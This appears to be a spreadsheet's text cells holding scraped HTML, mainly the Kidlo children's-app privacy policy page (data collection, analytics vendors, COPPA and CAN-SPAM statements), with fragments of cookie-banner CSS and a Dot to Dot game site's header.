.moove-gdpr-info-bar-content{padding-left:30px;padding-right:30px;text-align:left;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;width:100%}#moove_gdpr_cookie_info_bar .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content p{margin:0;font-size:14px;line-height:18px;font-weight:700;padding-bottom:0;color:#fff}#moove_gdpr_cookie_info_bar .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.mgbutton{font-size:14px;line-height:20px;color:#fff;font-weight:700;text-decoration:none;border-radius:150px;padding:8px 30px;border:none;display:inline-block;margin:3px 4px;white-space:nowrap;text-transform:none;letter-spacing:0}#moove_gdpr_cookie_info_bar .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content .moove-gdpr-button-holder{padding-left:15px;padding-left:3vw}#moove_gdpr_cookie_info_bar *{box-sizing:border-box}@media (max-width:767px){#moove_gdpr_cookie_modal li button .gdpr-svg-icon{margin-right:0;text-align:center;width:25px;height:25px}#moove_gdpr_cookie_modal li button .gdpr-svg-icon svg{height:25px}.gdpr-icon.moovegdpr-arrow-close:after,.gdpr-icon.moovegdpr-arrow-close:before{height:14px;top:calc(50% - 7px)}#moove_gdpr_cookie_info_bar .moove-gdpr-button-holder{-ms-flex-wrap:wrap;flex-wrap:wrap}#moove_gdpr_cookie_modal .moove-gdpr-modal-content.moove_gdpr_modal_theme_v1 .moove-gdpr-modal-right-content,#moove_gdpr_cookie_modal .moove-gdpr-modal-content.moove_gdpr_modal_theme_v1 .moove-gdpr-tab-content,#moove_gdpr_cookie_modal .moove-gdpr-modal-content.moove_gdpr_modal_theme_v1 .moove-gdpr-tab-main{min-height:40vh;max-height:calc(100vh - 180px)}#moove_gdpr_cookie_modal .moove-gdpr-mod</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
   &lt;META NAME="Keywords" CONTENT="kidlo, contact us, kidlo coding, kidlo phonics, preschool, early, learning, fun, app"/&gt;
&lt;META NAME="Description" CONTENT="Welcome to the online home of Kidlo.com"/&gt;
    &lt;meta name="author" content=""&gt;
    &lt;title&gt;Privacy Policy | Kidlo.com&lt;/title&gt;
     &lt;link rel="shortcut icon" href="images/ico/favicon.ico" /&gt;
    &lt;!-- core CSS --&gt;
    &lt;link href="css/bootstrap.min.css" rel="stylesheet"&gt;
    &lt;link href="css/font-awesome.min.css" rel="stylesheet"&gt;
    &lt;link href="css/main.css" rel="stylesheet"&gt;
    &lt;link href="css/responsive.css" rel="stylesheet"&gt;
    &lt;!--[if lt IE 9]&gt;
    &lt;script src="js/html5shiv.js"&gt;&lt;/script&gt;
    &lt;script src="js/respond.min.js"&gt;&lt;/script&gt;
    &lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;       
		&lt;link href='https://fonts.googleapis.com/ css?family=Raleway' rel='stylesheet' type='text/css'&gt;
	&lt;link href='https://fonts.googleapis.com/css?family=Lato:400,300' rel='stylesheet' type='text/css'&gt;
	&lt;style&gt;
	.lead{font-size:20px;}
	.lead a{color:blue;}
a.fb-msg-btn{
display: inline-block;
font-family: inherit;
font-size: 14px;
font-weight: bold;
color: #fff;
text-align: center;
padding: 12px 16px;
margin: 0;
background-color: #012198;
border: 0;
border-radius: 5px; 
-moz-border-radius: 5px; 
-webkit-border-radius: 5px;
cursor: pointer;
outline: none;
margin-bottom:5px;
}
a:hover.fb-msg-btn { 
background-color: #0268c7; 
}
.navbar-default{
	background-color: #01bbff;
}
	&lt;/style&gt;
&lt;/head&gt;&lt;!--/head--&gt;
  &lt;body data-spy="scroll" data-target=".navbar-fixed-top"  &gt;
    &lt;header id="header"&gt;
       &lt;header id="header" &gt;
	&lt;nav class="navbar navbar-default navbar-fixed-top"  id="tf-menu" &gt;
		&lt;div class="container"&gt;
			&lt;div class="row"&gt;
				&lt;!-- Logo start --&gt;
				&lt;div class="navbar-header"&gt;
					&lt;button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target=".navbar-collapse" aria-expanded="false" style="margin-top: 11px;"&gt;
						&lt;span class="sr-only"&gt;Toggle navigation&lt;/span&gt;
						&lt;span class="icon-bar"&gt;&lt;/span&gt;
						&lt;span class="icon-bar"&gt;&lt;/span&gt;
						&lt;span class="icon-bar"&gt;&lt;/span&gt;
					&lt;/button&gt;
					&lt;div class="navbar-brand"&gt;
						&lt;a href="/" class="page-scroll"&gt;
							&lt;img class="img-responsive" src="https://www.kidlo.com/images/KidloLogo.png" alt="kidlo apps for toddlers" style="width:85px;padding-left: 15px;"&gt;
						&lt;/a&gt; 
					&lt;/div&gt;                   
				&lt;/div&gt;
				&lt;div class="collapse navbar-collapse clearfix navMenu" role="navigation"&gt;
					&lt;ul class="nav navbar-nav navbar-right"&gt;
						&lt;li class="active"&gt;&lt;a class="page-scroll" href="https://www.kidlo.com/" &gt;Home&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&lt;a class="page-scroll" href="https://www.kidlo.com/review.php" &gt;Reviews&lt;/a&gt;&lt;/li&gt;
						&lt;li &gt;&lt;a class="page-scroll" href="https://www.kidlo.com/award.php" &gt;Awards&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&lt;a class="page-scroll" href="https://www.kidlo.com/forschool.php" &gt;Schools&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&lt;a class="page-scroll" href="https://www.kidlo.com/blog/" &gt;Blog&lt;/a&gt;&lt;/li&gt;
						&lt;li&gt;&lt;a class="page-scroll" href="https://www.kidlo.com/contact.php" &gt;Contact&lt;/a&gt;&lt;/li&gt;
					&lt;/ul&gt;
				&lt;/div&gt;
			&lt;/div&gt;
		&lt;/div&gt;
	&lt;/nav&gt;
&lt;/header&gt;&lt;!--/nav--&gt;
	&lt;/header&gt;&lt;!--/header--&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>Section features start --&gt;
    &lt;section id="service" style="background:white;"&gt;
    	&lt;div class="container"&gt;
			&lt;div class="featuresdiv" style = "padding-top:61px;"&gt;
				&lt;h2 style = "color:black; padding-left:15px; padding-top:15px;"&gt;&lt;b&gt;Privacy Policy&lt;/b&gt;&lt;/h2&gt;
				&lt;br&gt;
				&lt;div class="formfields" style = "font-size: 18px; color:black ;padding-left:15px; padding-right:15px;text-align:justify"&gt;
				&lt;p class = "lead"&gt;All Kidlo Apps are safe for kids and parents.&lt;/p&gt;&lt;br&gt;
				&lt;p class = "lead"&gt;This is the privacy policy for all Kidlo Apps developed and owned by IDZ Digital Private Limited ("IDZ Digital Private Limited", "we", or "us"). We value the privacy of both the parents/guardians as well as the children who are using the apps and have, thus, created this Privacy Policy (the "Privacy Policy") to show our commitment towards safeguarding your privacy. Your privacy is very important to us, and we take it seriously.</t>
  </si>
  <si>
    <t>Please read our Privacy Policy below and let us know if you have any questions or other feedback regarding it.
				 &lt;/p&gt;&lt;br&gt;
				&lt;p class = "lead"&gt;By using our apps or any services linked to the apps, you agree to our Privacy Policy and Terms of Service.&lt;/p&gt;&lt;br&gt;
				&lt;h3 style = "font-size: 24px;"&gt;Personal Information&lt;/h3&gt;
				&lt;p class = "lead"&gt;We do not collect any Personal Information like name, phone number, address, location, child's name etc., from the app users. Only if you choose to register for a Kidlo account and enter your email address, your email address is stored in a secure server.</t>
  </si>
  <si>
    <t>We do not collect any information apart from email address while registering your account. An email address is required for the purpose of registration, resetting password, getting access to more features, etc. While registering if you opt-in to receive emails from us for marketing purposes, we may send you emails from time to time.</t>
  </si>
  <si>
    <t>We do not share your email address with any third party for any purpose. We use services like MailChimp  to send you these marketing emails from time to time. Hence we may save the email address in our account there.</t>
  </si>
  <si>
    <t>You can unsubscribe from our newsletter email list any time by clicking the unsubscribe button at the bottom of every email. 
				 &lt;br&gt;		
				We do not collect any Personal Information like name, phone number, address, location, child's name etc., from the app users. However if you choose to use the Subscription Service.</t>
  </si>
  <si>
    <t>We do not share your email address with any third party. We may use services like MailChimp and similar others to send you emails from time to time. Hence we may save the email address in our account there.&lt;br&gt;
				MailChimp Privacy Policy: &lt;a href="https://mailchimp.com/legal/privacy/"&gt;https://mailchimp.com/legal/privacy/&lt;/a&gt;
				&lt;br&gt;
				If we do happen to obtain any personal information, including emails or phone numbers obtained through support requests or other correspondence, it will be treated with the strictest confidentiality.</t>
  </si>
  <si>
    <t>Any such personal information will never be shared with any other entities. Any such personal information will be retained towards resolution of the support requests and for future reference if you need support again. We can delete the emails anytime on your request.</t>
  </si>
  <si>
    <t xml:space="preserve">We use Google's G Suite for Business for our emails.
				 &lt;br&gt;
				&lt;br&gt;
				&lt;b&gt;TrueDepth API:&lt;/b&gt; We use this API in some of our apps to track the facial expressions and movements to place our face filters for enhanced user experience.
				</t>
  </si>
  <si>
    <t>&lt;br&gt;	
				Please note that no data is collected or stored with this API.
				 &lt;br&gt;
				&lt;p class = "lead"&gt;Know more about this API: &lt;a href = "https://developer.apple.com/documentation/arkit/arfacetrackingconfiguration" target="_blank"&gt;https://developer.apple.com/documentation/arkit/arfacetrackingconfiguration&lt;/a&gt;&lt;/p&gt;
				&lt;/p&gt;
				&lt;h3 style = "font-size: 24px;"&gt;Non-Personal Information:&lt;/h3&gt;
				&lt;p class = "lead"&gt;
				We make use of analytics services like Flurry, Google, Appsee, Mixpanel or Facebook that use cookies sent from our app running in your device in order to provide Non-Personal anonymous global data and information regarding app use. The kind of information collected includes the type of device or version of the OS you are using, app crash report, and general pattern of app use.</t>
  </si>
  <si>
    <t xml:space="preserve">Flurry, Appsee, Mixpanel and Facebook have their own Privacy Policies for the information they collect from the device via an app. Nonetheless, we seek to protect the integrity of our site and welcome any feedback about these sites.
				 &lt;br&gt;
				The links to their Privacy Policies are given below:&lt;/p&gt;&lt;br&gt;
				&lt;p class = "lead"&gt;Flurry Analytics Privacy Policy: &lt;a href="https://policies.yahoo.com/us/en/yahoo/privacy/index.htm " target="_blank"&gt;https://policies.yahoo.com/us/en/yahoo/privacy/index.htm &lt;/a&gt;&lt;/p&gt;
				&lt;p class="lead"&gt;Appsee Privacy Policy: &lt;a href="https://www.appsee.com/legal/privacypolicy " target="_blank"&gt;https://www.appsee.com/legal/privacypolicy &lt;/a&gt;&lt;/p&gt;
				&lt;p class="lead"&gt;Facebook Analytics Privacy Policy: &lt;a href="https://www.facebook.com/policy.php" target="_blank"&gt;https://www.facebook.com/policy.php &lt;/a&gt; &lt;/p&gt;
				&lt;p class="lead"&gt;Mixpanel Privacy Policy: &lt;a href="https://mixpanel.com/privacy/" target="_blank"&gt;https://mixpanel.com/privacy/ &lt;/a&gt; 
				</t>
  </si>
  <si>
    <t>We may send you push notifications via OneSignal service. No personal information is passed on to them at any point of time. &lt;br&gt;
				&lt;p class="lead"&gt;One Signal Privacy Policy: &lt;a href="https://onesignal.com/privacy_policy" target="_blank"&gt;https://onesignal.com/privacy_policy</t>
  </si>
  <si>
    <t>&lt;/a&gt; &lt;/p&gt;
				&lt;/p&gt;
				&lt;h3 style = "font-size: 24px;"&gt;Internet permissions&lt;/h3&gt;
				&lt;p class="lead"&gt;Our apps do typically require internet permissions, for the purpose of downloading additional content for the app, providing links to the app store entry of our other apps and to collect anonymous usage information for analytics as mentioned above.
				 &lt;/p&gt;
				&lt;h3 style = "font-size: 24px;"&gt;Age limitations: &lt;/h3&gt;
				&lt;p class="lead"&gt;We do not knowingly contact or do business with children under 13 years of age.</t>
  </si>
  <si>
    <t xml:space="preserve">If a parent/guardian becomes aware that a child under the age of 13 has attempted to contact and/or do business with us, please advise us by email at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="cab9bfbabaa5b8be8aa1a3aea6a5e4a9a5a7"&gt;[email&amp;#160;protected]&lt;/a&gt; so that we may rectify the situation.
				 &lt;/p&gt;
				&lt;h3 style = "font-size: 24px;"&gt;In-app purchases:  &lt;/h3&gt;
				&lt;p class="lead"&gt;Our apps may contain in-app purchases (IAP’s) or Subscriptions.&lt;/p&gt;
				&lt;h3 style = "font-size: 24px;"&gt;Advertising:   &lt;/h3&gt;
				&lt;p class="lead"&gt;We may occasionally cross-promote other products of our own within our apps.&lt;/p&gt;
				&lt;h3 style = "font-size: 24px;"&gt;Social media: &lt;/h3&gt;
				&lt;p class="lead"&gt;Our apps do not interact with any social media sites. We may provide links to our own social media sites for the purpose of providing support and product information.&lt;/p&gt;
				&lt;h3 style = "font-size: 24px;"&gt;Children's Privacy:&lt;/h3&gt;
				&lt;p class="lead"&gt;As creators of kids apps, we adhere to The Children's Online Privacy Protection Act (COPPA) (&lt;a href="http://www.coppa.org" target="_blank"&gt;http://www.coppa.org&lt;/a&gt;)&lt;br&gt;
				</t>
  </si>
  <si>
    <t>When it comes to the collection of personal information from children under the age of 13 years old, the Children's Online Privacy Protection Act (COPPA) puts parents in control. The Federal Trade Commission, United States' consumer protection agency, enforces the COPPA Rule, which spells out what operators of websites and online services must do to protect children's privacy and safety online. The privacy of your child is of paramount importance to you and we respect that.</t>
  </si>
  <si>
    <t>We DO NOT ask for or collect any child specific data like name, age, school, etc., anywhere in the apps. We may ask for your child's interests but that is just to personalize your child's experience on our app and show them relevant content. You can avoid personalizing the experience by not providing any interests and use the default options.</t>
  </si>
  <si>
    <t>We do not let third-parties, including plug-ins collect personally identifiable information from children. The In-App Purchases or Subscription Service are accessible only via the parental gate. Only after you enter the correct answer to the parental question, will the access to the parent page be granted.</t>
  </si>
  <si>
    <t xml:space="preserve">There are NO third-party advertisements in Kidlo Apps and any app-related third-party links such as social media pages, support and website are only accessible behind the parental gate and child lock buttons.&lt;/p&gt;
				&lt;h3 style = "font-size: 24px;"&gt;Use and Disclosure of Your Information:&lt;/h3&gt;
				&lt;p class="lead"&gt;We may use your email address we collect from you when you register, sign up for our newsletter, respond to a feedback survey or use certain other site features in the following ways:&lt;br&gt;&lt;br&gt;
				• To personalize your experience and to allow us to deliver the type of content and product offerings in which you are most interested.&lt;br&gt;
				• To quickly process or restore your transactions across different devices.&lt;br&gt;
				•  To send periodic emails regarding your order or other apps and services. Marketing emails will only be sent to you if you have opted in to get the same.&lt;br&gt;
				The anonymous Non-Personal global data that we get for analytics purposes is visible only to our developer team and is strictly for internal analysis to make your app-experience better over time. We do not disclose any of your Personal Information that we may collect but we reserve the right to disclose any of your Personal Information if demanded by law or when disclosure is necessary to protect our rights and/or to satisfy a legal procedure, a lawsuit or a judicial order.&lt;/p&gt;
				&lt;h3 style = "font-size: 24px;"&gt;CAN SPAM Act:&lt;/h3&gt;
				&lt;p class="lead"&gt;We collect your email address in order to:&lt;br&gt;
				• Send information, help you reset your password, respond to inquiries, and/or other requests or questions.&lt;br&gt;
				• Market to our mailing list (if you have opted in) or continue to send emails to our clients after the original transaction has occurred.&lt;br&gt;&lt;br&gt;
				To be in accordance with CANSPAM, we agree to the following:&lt;br&gt;
				• Include the physical address of our business or site headquarters.&lt;br&gt;
				• Monitor third-party email marketing services for compliance, if one is used.&lt;br&gt;
				• Honor opt-out/unsubscribe requests quickly.&lt;br&gt;
				• Allow users to unsubscribe by using the link at the bottom of each email.&lt;br&gt;&lt;br&gt;
				If at any time you would like to unsubscribe from receiving future emails, you can email us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="6a191f1a1a05181e2a01030e060544090507"&gt;[email&amp;#160;protected]&lt;/a&gt; or follow the instructions at the bottom of each email and we will promptly remove you from ALL correspondence.
				</t>
  </si>
  <si>
    <t>&lt;/p&gt;
				&lt;h3 style = "font-size: 24px;"&gt;Changes to Privacy Policy:&lt;/h3&gt;
				&lt;p class="lead"&gt;We reserve the right to modify our Privacy Policy at any time simply by posting such modification on this site and without any other notification. Any such modification will be effective immediately upon posting on this site. 
				 The use of the information we collect is always subject to the Privacy Policy that is in effect at the time when this information is collected.</t>
  </si>
  <si>
    <t>You are advised to refer to the Privacy Policy from time to time so that you are always in sync with our current privacy practices.
				 &lt;/p&gt;
				&lt;h3 style = "font-size: 24px;"&gt;Contacting Us:&lt;/h3&gt;
				&lt;p class="lead"&gt;If there are any questions regarding this privacy policy, you may contact us using the information below.&lt;br&gt;
				IDZ Digital Private Limited&lt;br&gt;
				607, Western Edge II, Borivali East, Mumbai 400066, India&lt;br&gt;
				Email:&lt;a href="support@kidlo.com"&gt;&lt;span class="__cf_email__" data-cfemail="bbc8cecbcbd4c9cffbd0d2dfd7d495d8d4d6"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;
				&lt;/p&gt;
				&lt;p class="lead"&gt;This Privacy Policy was last modified on May 24, 2018.&lt;/p&gt;&lt;br&gt;
			&lt;/div&gt;
		&lt;/div&gt;&lt;!-- container end --&gt;
    &lt;/section&gt;
    &lt;!-- Section features end --&gt;
	&lt;!--</t>
  </si>
  <si>
    <t>section Footer start  --&gt;
			 &lt;section id="call-to-action"&gt;_x005F_x000D_
	&lt;div class="container"&gt;_x005F_x000D_
		&lt;div class="row"&gt;_x005F_x000D_
			&lt;div class="col-md-12"&gt;_x005F_x000D_
				&lt;div class="block"&gt;_x005F_x000D_
					&lt;h1 class="title wow fadeInDown" data-wow-delay=".3s" data-wow-duration="500ms"&gt;CONTACT US   &lt;/h1&gt;_x005F_x000D_
					&lt;h3 class="wow fadeInDown" data-wow-delay=".5s" data-wow-duration="500ms"&gt;&lt;p&gt;Feel free to email us on &lt;a href="/cdn-cgi/l/email-protection#7e0d0b0e0e110c0a3e15171a1211501d1113" target="_top"&gt;&lt;span class="__cf_email__" data-cfemail="196a6c6969766b6d5972707d7576377a7674"&gt;[email&amp;#160;protected]&lt;/span&gt; &lt;/a&gt; regarding your queries. You can also chat with us now.&lt;br&gt;_x005F_x000D_
					&lt;/p&gt;&lt;/h3&gt;_x005F_x000D_
					&lt;a href="https://m.me/kidlo" class="fb-msg-btn" target="_blank"&gt;_x005F_x000D_
						&lt;img src="https://www.kidlo.com/msg.png" alt = "FB Messenger" style="width: 50px; margin-right: 15px; float: left;" &gt;&lt;span&gt;</t>
  </si>
  <si>
    <t>Have any questions? &lt;br&gt;_x005F_x000D_
							Chat with us NOW!&lt;/span&gt; _x005F_x000D_
					&lt;/a&gt;_x005F_x000D_
					_ x000D_
				_</t>
  </si>
  <si>
    <t>x000D_
				&lt;p style="font-size:12px;"&gt;&lt;a href="https://www.kidlo.com"&gt;Kidlo.com &lt;/a&gt; © 2023 IDZ Digital Private Limited. All Rights Reserved.</t>
  </si>
  <si>
    <t>&lt;br&gt; Designed by&lt;a href="https://themefisher.com/" target="_blank"&gt;Themefisher&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
			&lt;br&gt;_x005F_x000D_
			&lt;br&gt;_x005F_x000D_
			&lt;br&gt;_x005F_x000D_
			&lt;div class="col-md-12 col-sm-12" style="bottom:0px;"&gt;_x005F_x000D_
				&lt;div class="block"&gt;_x005F_x000D_
_x005F_x000D_
					&lt;div class="col-md-2 col-sm-2 col-xs-12"&gt;&lt;a href="https://www.kidlo.com/blog/"&gt;&lt;p&gt;Blog&lt;/p&gt;&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
					&lt;div class="col-md-2 col-sm-2 col-xs-12"&gt;&lt;a href="https://www.kidlo.com/review.php"&gt;&lt;p&gt;Reviews&lt;/p&gt;&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
					&lt;div class="col-md-2 col-sm-2 col-xs-12"&gt;&lt;a href="https://www.kidlo.com/contact.php"&gt;&lt;p&gt;Contact Us&lt;/p&gt;&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
					&lt;div class="col-md-3 col-sm-3 col-xs-12"&gt;&lt;a href="https://www.kidlo.com/privacypolicy.php"&gt;&lt;p&gt;Privacy Policy&lt;/p&gt;&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
					&lt;div class="col-md-3 col-sm-3 col-xs-12"&gt;&lt;a href="https://www.kidlo.com/terms_of_service.php"&gt;&lt;p&gt;Terms Of Service&lt;/p&gt;&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
			_ x000D_
				&lt;/div&gt;_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
&lt;/section&gt;_x005F_x000D_
			_ x000D_
&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Default Statcounter code for kidlo.com http://kidlo.com_x005F_x000D_
--&gt;_x005F_x000D_
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;script type="text/javascript"&gt;_x005F_x000D_
var sc_project=11610450; _x005F_x000D_
 var sc_invisible=1; _x005F_x000D_
var sc_security="8a8042e8"; _x005F_x000D_
&lt;/script&gt;_x005F_x000D_
 &lt;script type="text/javascript"_x005F_x000D_
src="https://www.statcounter.com/counter/counter.js"_x005F_x000D_
async&gt;&lt;/script&gt;_x005F_x000D_
&lt;noscript&gt;&lt;div class="statcounter"&gt;&lt;a title="Web Analytics_x005F_x000D_
Made Easy - StatCounter" href="https://statcounter.com/"_x005F_x000D_
</t>
  </si>
  <si>
    <t>target="_blank"&gt;&lt;img class="statcounter"_x005F_x000D_
src="https://c.statcounter.com/11610450/0/8a8042e8/1/"_x005F_x000D_
alt="Web Analytics Made Easy -_x005F_x000D_
StatCounter"&gt;&lt;/a&gt;&lt;/div&gt;&lt;/noscript&gt;_x005F_x000D_
&lt;!-- End of Statcounter Code --&gt;_x005F_x000D_
_x005F_x000D_
&lt;!--    GOOGLE ANALYTICS	--&gt;_x005F_x000D_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_ x000D_
  ga('create', 'UA-72221-37', 'auto');_x005F_x000D_
  ga('set', 'anonymizeIp', true);_x005F_x000D_
  ga('send', 'pageview');_x005F_x000D_
  _x005F_x000D_
_x005F_x000D_
&lt;/script&gt;		
	&lt;!--</t>
  </si>
  <si>
    <t>section Footer end  --&gt;
	&lt;!-- Back To Top Button --&gt;
&lt;!-- Start of StatCounter Code for Default Guide --&gt;
&lt;script type="text/javascript"&gt;
var sc_project=11610450; 
var sc_invisible=1; 
var sc_security="8a8042e8"; 
var scJsHost = (("https:" == document.location.protocol) ?
"https://secure."</t>
  </si>
  <si>
    <t xml:space="preserve">: "http://www.");
&lt;/script&gt;
&lt;script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js"
async&gt;&lt;/script&gt;
&lt;noscript&gt;&lt;div class="statcounter"&gt;&lt;a title="Web Analytics
Made Easy - StatCounter" href="http://statcounter.com/"
target="_blank"&gt;&lt;img class="statcounter"
src="//c.statcounter.com/11610450/0/8a8042e8/1/" alt="Web
Analytics Made Easy - StatCounter"&gt;&lt;/a&gt;&lt;/div&gt;&lt;/noscript&gt;
&lt;!-- End of StatCounter Code for Default Guide --&gt;
    &lt;script type="text/javascript" src="js/owl.carousel.js"&gt;&lt;/script&gt;
    &lt;script type="text/javascript" src="js/jquery.backstretch.min.js"&gt;&lt;/script&gt;
    &lt;!-- Custom js --&gt;
    &lt;script type="text/javascript" src="js/custom.js"&gt;&lt;/script&gt;
	&lt;script src="js/bootstrap.min.js"&gt;&lt;/script&gt;
    &lt;script src="js/jquery.prettyPhoto.js"&gt;&lt;/script&gt;
    &lt;script src="js/main.js"&gt;&lt;/script&gt;
  &lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en"&gt;&lt;head&gt;&lt;meta charSet="utf-8" class="next-head"/&gt;&lt;link rel="preload" href="/_next/6902d533-79ff-458f-a7a4-7e62aeded997/page/privacy.js" as="script"/&gt;&lt;link rel="preload" href="/_next/6902d533-79ff-458f-a7a4-7e62aeded997/page/_error.js" as="script"/&gt;&lt;link rel="preload" href="/_next/b2918f29fac23ae832b8217331526d15/app.js" as="script"/&gt;&lt;meta data-react-helmet="true" property="og:title" content="Dot to Dot - Connect the Dots"/&gt;&lt;meta data-react-helmet="true" property="og:url" content="https://www.dottodot.com"/&gt;&lt;meta data-react-helmet="true" property="og:image" content="/static/banner.png"/&gt;&lt;meta data-react-helmet="true" property="og:description" content="The first and the most polished dot to dot game on mobile platforms with thousands of dots. "/&gt;&lt;meta</t>
  </si>
  <si>
    <t>data-react-helmet="true" property="og:type" content="website"/&gt;&lt;title data-react-helmet="true"&gt;Dot to Dot - Connect the Dots&lt;/title&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"/&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1"/&gt;&lt;meta http-equiv="x-ua-compatible" content="ie=edge"/&gt;&lt;meta name="apple-itunes-app" content="app-id=1227734600"/&gt;&lt;meta name="google-play-app" content="app-id=com.two.bros.games.dot.to.dot"/&gt;&lt;link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/10up-sanitize.css/5.0.0/sanitize.min.css"/&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Roboto:400,500,700" rel="stylesheet"/&gt;&lt;link rel="apple-touch-icon" sizes="180x180" href="/static/favicons/apple-touch-icon.png"/&gt;&lt;link rel="android-touch-icon" href="/static/favicons/apple-touch-icon.png"/&gt;&lt;link rel="icon" type="image/png" sizes="32x32" href="/static/favicons/favicon-32x32.png"/&gt;&lt;link rel="icon" type="image/png" sizes="16x16" href="/static/favicons/favicon-16x16.png"/&gt;&lt;link rel="manifest" href="/static/favicons/site.webmanifest"/&gt;&lt;link rel="mask-icon" href="/static/favicons/safari-pinned-tab.svg" color="#207ce5"/&gt;&lt;meta name="theme-color" content="#ffffff"/&gt;&lt;meta name="robots" content="index, follow"/&gt;&lt;style data-styled-components="TeYrg bZxfvJ eVIXfo cWLNqs hYsvRW fwujKP kpjRbL hKiLMS hFUbDu goOGKE lmDNkI boZRIf bUtYML dYKyrI iHZvIS eUfhTP eqpWjl ctCbqZ kYmYWE kMCagF bOEeyR ktadu ioGvUg eqgzfJ ihWdar cTvBZC cfccgO gHlKi</t>
  </si>
  <si>
    <t>jqPWXW bWJXQd joJHnh bGJXLQ hUZglJ exEkaP jvGgBB fcuxsQ jRZCWw gKGcHl kEbXjd fMlDZe fDcQSg iqGwDQ dYyVFs cqHEmi iYcFZk gVfJKD gBJRGs ctbUxZ blMJYy gKwiMq frXiGb hPRoey klltvo ewSLIB kHnDlj inSwVP itKMMP"&gt;
/* sc-component-id: sc-1eluo13-0 */
.exEkaP{font-size:1.4rem;margin-bottom:20px;color:#655540;} @media (min-width:48em){.exEkaP{font-size:1.6rem;}}.jvGgBB{font-size:1.4rem;color:#655540;} @media (min-width:48em){.jvGgBB{font-size:1.6rem;}}.fcuxsQ{font-size:1.4rem;color:#fff;} @media (min-width:48em){.fcuxsQ{font-size:1.6rem;}}
/* sc-component-id: md6ux4-0 */
.gHlKi{font-weight:700;color:#fff;font-size:4rem;line-height:1.2;margin-bottom:15px;} @media (min-width:48em){.gHlKi{font-size:6.0rem;}}
/* sc-component-id: md6ux4-1 */
.gKwiMq{font-size:1.6rem;color:#F4B3A5;line-height:1.2;} @media (min-width:48em){.gKwiMq{font-size:2.7rem;}}
/* sc-component-id: md6ux4-2 */
.kHnDlj{font-weight:700;font-size:3rem;padding-bottom:2.7rem;margin:0;-webkit-letter-spacing:0.5px;-moz-letter-spacing:0.5px;-ms-letter-spacing:0.5px;letter-spacing:0.5px;line-height:1.5;white-space:pre-line;color:#F45E3E;} @media (min-width:48em){.kHnDlj{font-size:3.5rem;-webkit-letter-spacing:0.7px;-moz-letter-spacing:0.7px;-ms-letter-spacing:0.7px;letter-spacing:0.7px;}} @media (min-width:64em){.kHnDlj{font-size:4.0rem;}}.inSwVP{font-weight:700;font-size:3rem;padding-bottom:2.7rem;margin:0;-webkit-letter-spacing:0.5px;-moz-letter-spacing:0.5px;-ms-letter-spacing:0.5px;letter-spacing:0.5px;line-height:1.5;white-space:pre-line;color:#fff;} @media (min-width:48em){.inSwVP{font-size:3.5rem;-webkit-letter-spacing:0.7px;-moz-letter-spacing:0.7px;-ms-letter-spacing:0.7px;letter-spacing:0.7px;}} @media (min-width:64em){.inSwVP{font-size:4.0rem;}}.itKMMP{font-weight:700;font-size:3rem;padding-bottom:2.7rem;margin:0;-webkit-letter-spacing:0.5px;-moz-letter-spacing:0.5px;-ms-letter-spacing:0.5px;letter-spacing:0.5px;line-height:1.5;white-space:pre-line;color:#655540;} @media (min-width:48em){.itKMMP{font-size:3.5rem;-webkit-letter-spacing:0.7px;-moz-letter-spacing:0.7px;-ms-letter-spacing:0.7px;letter-spacing:0.7px;}} @media (min-width:64em){.itKMMP{font-size:4.0rem;}}
/* sc-component-id: md6ux4-3 */
.hUZglJ{font-weight:700;font-size:1.8rem;-webkit-letter-spacing:0.3px;-moz-letter-spacing:0.3px;-ms-letter-spacing:0.3px;letter-spacing:0.3px;color:#655540;padding:40px 0 15px;} @media (min-width:48em){.hUZglJ{font-size:2.0rem;-webkit-letter-spacing:0.7px;-moz-letter-spacing:0.7px;-ms-letter-spacing:0.7px;letter-spacing:0.7px;}}
/* sc-component-id: sc-bdVaJa */
